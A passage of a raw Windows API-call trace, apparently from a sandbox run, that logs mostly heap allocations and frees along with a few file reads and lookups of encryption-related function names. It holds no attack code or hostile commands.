HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0189.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0189.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0189.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0189.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0189.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0189.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0189.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0189.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0189.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0189.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0189.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe54020 [0189.564] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0189.564] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0189.568] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x6d7, lpOverlapped=0x0) returned 1 [0189.569] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0189.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0189.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0189.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0189.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0189.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x106d7) returned 0x2f24018 [0189.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe54020 | out: hHeap=0x970000) returned 1 [0189.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0189.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0189.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0189.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0189.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0189.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0189.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0189.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0189.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x106d7) returned 0x2f346f8 [0189.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0189.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0189.577] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0189.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0189.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0189.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0189.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0189.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x106d7) returned 0x2f24018 [0189.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0189.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0189.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0189.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0189.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0189.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0189.580] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0189.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0189.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0189.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0189.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0189.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0189.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0189.580] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0189.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0189.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0189.580] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0189.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0189.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0189.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0189.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cf8 [0189.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0189.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0189.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0189.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0189.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x106d7) returned 0x2f24018 [0189.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0189.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d08 [0189.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0189.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0189.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0189.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b38 [0189.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0189.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0189.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0189.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ba8 [0189.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0189.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0189.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0189.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0189.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0189.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0189.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0189.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0189.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0189.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x106d7) returned 0x3be0048 [0189.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0189.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0189.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0189.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0189.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0189.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0189.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0189.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0189.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0189.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0189.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0189.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0189.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0189.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0189.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0189.587] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0189.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0189.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0189.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0189.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0189.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0189.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0189.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0189.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0189.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0189.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0189.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0189.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0189.588] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0189.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0189.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0189.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0189.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0189.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0189.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0189.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0189.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0189.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0189.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0189.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0189.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0189.588] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0189.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0189.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0189.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0189.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0189.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0189.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0189.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0189.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0189.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0189.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0189.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0189.589] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0189.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0189.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0189.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0189.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0189.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0189.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0189.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0189.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0189.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0189.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0189.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0189.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0189.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0189.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0189.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0189.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0189.592] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0189.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0189.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0189.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0189.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0189.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0189.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0189.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0189.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0189.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0189.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0189.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0189.593] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0189.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0189.593] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0189.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0189.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0189.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0189.594] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0189.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0189.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0189.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0189.594] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0189.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0189.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0189.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0189.594] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0189.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0189.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0189.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0189.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0189.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0189.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0189.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0189.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0189.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0189.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0189.595] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0189.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0189.595] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0189.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0189.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0189.595] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0189.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0189.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0189.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0189.595] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0189.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0189.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0189.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0189.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.595] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0189.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0189.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0189.595] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0189.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0189.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0189.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0189.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0189.596] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0189.596] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0189.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0189.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0189.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 